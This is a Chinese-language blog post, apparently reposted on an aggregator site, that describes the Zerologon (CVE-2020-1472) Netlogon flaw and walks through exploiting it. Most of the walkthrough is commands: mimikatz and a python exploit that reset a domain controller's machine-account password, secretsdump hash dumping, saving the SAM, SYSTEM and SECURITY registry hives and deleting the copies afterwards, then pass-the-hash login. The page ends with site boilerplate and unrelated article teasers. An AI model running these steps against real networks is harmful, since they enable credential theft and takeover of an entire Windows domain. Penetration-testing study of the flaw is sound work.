域渗透之Zerologon域提权漏洞

域渗透之Zerologon域提权漏洞组件概述Netlogon远程协议是一个远程过程调用(RPC)接口,用于基于域的网络上的用户和计算机身份验证。Netlogon远程协议RPC接口还用于为备份域控制

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

域渗透之Zerologon域提权漏洞

组件概述

Netlogon远程协议是一个远程过程调用(RPC)接口,用于基于域的网络上的用户和计算机身份验证。Netlogon远程协议RPC接口还用于为备份域控制器(BDC)复制数据库。

Netlogon远程协议用于维护从域成员到域控制器(DC),域的DC之间以及跨域的DC之间的域关系。此RPC接口用于发现和管理这些关系。

漏洞概述

该漏洞主要是由于在使用Netlogon安全通道与域控进行连接时,由于认证协议加密部分的缺陷,导致攻击者可以将域控管理员用户的密码置为空,从而进一步实现密码hash获取并最终获得管理员权限。成功的利用可以实现以管理员权限登录域控设备,并进一步控制整个域。

漏洞范围

Microsoft Windows Server 2008 R2 SP1

Microsoft Windows Server 2012

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2016

Microsoft Windows Server 2019

Microsoft Windows Server version 2004 (Server Core Installation)

Microsoft Windows Server version 1903 (Server Core Installation)

Microsoft Windows Server version 1909 (Server Core Installation)

影响Windows Server 2008R 2至Windows Server 2019的多个版本系统

漏洞复现

privilege::debug

# 检测是否存在漏洞
lsadump::zerologon /target:<dc-ip> /account:<主机名>$

# 重置密码
lsadump::zerologon /target:<dc-ip> /account:<主机名>$ /exploit

或使用脚本

python3 cve-2020-1472-exploit.py -n server2012 -t 10.211.55.12

-n指定域控计算机主机名

-t指定域控ip

运行exp,确定把域控机器账户密码置换成空

完成后使用

python secretsdump.py 域名/ADD-DC$@192.168.11.15 -no-pass

拖hash,获取域管hash后使用psexec等进行pth登录

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

# 获取文件路径
get system.saveget sam.save
get security.save 

# 删除文件
del /f system.save
del /f sam.save
del /f security.save

解密本地凭据

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

域渗透之Zerologon域提权漏洞

$MACHINE.ACC: 的值,然后使用reinstall_original_pw.py进行还原凭据

python3 reinstall_original_pw.py Motoo-DCSRV 192.168.159.149 ce7b34c0f2c72d6cb03123ef5ff741ca

机器名可通过nslookup 或nbtscan等netbios扫描获取

参考

CVE-2020-1472 Netlogon权限提升漏洞分析

CVE-2020-1472 Zerologon

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/119829.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • 数学励志公式:每天进步一点点「建议收藏」

    数学励志公式:每天进步一点点「建议收藏」​数学的魅力真是无穷的,不信,你往下看!单纯的一个数学公式都可以作为你的励志名言,还不好好学数学吗?勤学如初起之苗,不见其增,日有所长辍学如磨刀之石,不见其损,日有所亏。等式11.01365=37.80.99365=0.031.01^{365}=37.8\\0.99^{365}=0.031.01365=37.80.99365=0.03等式21.02365=1377.40.98365=0.00061.02^{365}=1377.4\\0.98^{365}=0.0006

  • 硬件知识汇总

    硬件知识汇总硬件知识1、电源类1.1 电源基础各种“地”——各种“GND”板载电源设计规范电源环路稳定性评价方法深入芯片内部,理解去耦电容的作用减小DC/DC变换器中的接地反弹——一些接地要点开关电源中的小启示电源相关的测试去耦电容的选择、容值计算和布局布线可充电电池将被超级电容取代电容去耦原理(解释十分透彻)地线要短——测试开关电源纹波时权衡电源与PCB设计极点是男人,零点是女人开关电源仿真(sab…

  • 公众号 unionid_微信公众号免费模板

    公众号 unionid_微信公众号免费模板获取用户基本信息(UnionID机制)获取用户基本信息(UnionID机制)获取用户基本信息(UnionID机制)在关注者与公众号产生消息交互后,公众号可获得关注者的OpenID(加密后的微信号

  • Maven cmd 打包命令

    Maven cmd 打包命令转载:https://blog.csdn.net/qq_34927809/article/details/80108376cd到需要打包项目的pom.xml文件下:输入mvncleaninstall-Dmaven.test.skip=true-Dmaven.javadoc.skip=true打包到本地项目的target下面…

  • python3变量命名规则_python 变量命名规则

    python3变量命名规则_python 变量命名规则原博文2020-05-1410:53−python标识符命名规则:1,标识符只能包含大、小写字母、数字、下划线“_”,并且不能以数字开头2,标识符不能与python关键字相同,但可以包含3,标识符不能包含空格tips:a,python的标识符区分大小写,如变量number与变量Number表示不同的变量…相关推荐2019-09-2821:13−Pythonpython是一种跨平台的计…

  • 【Linux 内核】Linux 内核源码结构 ( 下载 Linux 内核源码 | 使用 VSCode 阅读 Linux 内核源码 )[通俗易懂]

    【Linux 内核】Linux 内核源码结构 ( 下载 Linux 内核源码 | 使用 VSCode 阅读 Linux 内核源码 )[通俗易懂]一、下载Linux内核源码、二、使用VSCode阅读Linux内核源码

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号